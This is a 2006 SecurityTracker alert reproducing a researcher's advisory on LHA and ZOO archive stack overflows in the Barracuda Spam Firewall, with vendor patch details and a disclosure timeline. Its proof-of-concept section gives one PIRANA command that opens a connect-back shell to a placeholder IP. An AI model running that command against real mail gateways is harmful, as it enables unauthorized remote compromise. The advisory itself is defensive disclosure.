SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Device (Embedded Server/Appliance)  >  Barracuda Spam Firewall Vendors:  Barracuda Networks
Barracuda Spam Firewall Buffer Overflows in Processing LHA and ZOO Archives Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015866
SecurityTracker URL:  http://securitytracker.com/id?1015866
CVE Reference:  CVE-2004-0234 ,  CVE-2006-0855   (Links to External Site)
Date:  Apr 4 2006
Impact:  Execution of arbitrary code via network, User access via network
Fix Available:  Yes   Vendor Confirmed:  Yes  
Version(s): with firmware < 3.3.03.022 and with spamdef < 3.0.10045
Description:  Two vulnerabilities were reported in the Barracuda Spam Firewall. A remote user can execute arbitrary code on the target user's system.

A remote user can send e-mail with a specially crafted LHA archive containing a long filename to trigger a stack overflow and execute arbitrary code on the target device.

A remote user can also send an e-mail with a specially crafted ZOO archive to trigger a stack overflow and execute arbitrary code.

The vendor was notified on March 2, 2006.

Jean-Sebastien Guay-Leroux discovered this vulnerability. Ulf Harnhammar originally discovered the underlying LHA vulnerability.
Impact:  A remote user can execute arbitrary code on the target system.
Solution:  The vendor has issued a firmware fix (3.3.03.022) and a patched spamdef (3.0.10045).
Vendor URL:  www.barracudanetworks.com (Links to External Site)
Cause:  Boundary error
Reported By:  Jean-Sebastien_Guay-Leroux <jean-sebastien@guay-leroux.com>
Message History:   None.

 Source Message Contents
Date:  Mon, 03 Apr 2006 19:51:17 -0400
From:  =?ISO-8859-1?Q?Jean-S=E9bastien_Guay-Leroux?= <jean-sebastien@guay-leroux.com>
Subject:  Barracuda LHA archiver security bug leads to remote compromise

 
Topic:                  Barracuda LHA archiver security bug leads to
                        remote compromise

Announced:              2006-04-03
Product:                Barracuda Spam Firewall
Vendor:                 http://www.barracudanetworks.com/
Impact:                 Remote shell access
Affected product:       Barracuda with firmware < 3.3.03.022 AND
                        spamdef < 3.0.10045
Credits:                Jean-Sébastien Guay-Leroux
CVE ID:                 CVE-2004-0234


I.      BACKGROUND

The Barracuda Spam Firewall is an integrated hardware and software solution for
complete protection of your email server. It provides a powerful, easy to use,
and affordable solution to eliminating spam and virus from your organization by
providing the following protection:

 * Anti-spam
 * Anti-virus
 * Anti-spoofing
 * Anti-phishing
 * Anti-spyware (Attachments)
 * Denial of Service


II.     DESCRIPTION

When building a special LHA archive with long filenames in it, it is possible to
overflow a buffer on the stack used by the program and seize control of the
program.

Since this component is used when scanning an incoming email, remote compromise
is possible by sending a simple email with the specially crafted LHA archive
attached to the Barracuda Spam Firewall.

You do NOT need to have remote administration access (on port 8000) for
successfull exploitation.

For further informations about the details of the bugs, you can consult OSVDB
#5753 and #5754 .


III.    IMPACT

Gain shell access to the remote Barracuda Spam Firewall


IV.     PROOF OF CONCEPT

Using the PIRANA framework, available at http://www.guay-leroux.com , it is
possible to test the Barracuda Spam Firewall against the LHA vulnerability.

By calling PIRANA the way it is described below, you will get a TCP connect back
shell on IP address 1.2.3.4 and port 1234:

perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \
-p 1234 -z -c 1 -d 1


V.      SOLUTION

Barracuda Networks pushed an urgent critical patch in spamdef #3.0.10045,
available March 24th 2006.

They also published an official patch in firmware #3.3.03.022, available April
3rd 2006.

It is recommended to update to firmware #3.3.03.022 .


VI.     CREDITS

Ulf Harnhammar who found the original LHA flaw.

Jean-Sébastien Guay-Leroux who conducted further research on the bug
and produced exploitation plugin for the PIRANA framework.


VII.    REFERENCES

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0234


VIII.   HISTORY

2006-03-02 : Disclosure of vulnerability to Barracuda Networks
2006-03-02 : Acknowledgement of the problem
2006-03-24 : Problem fixed
2006-04-03 : Advisory disclosed to public


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2006, SecurityGlobal.net LLC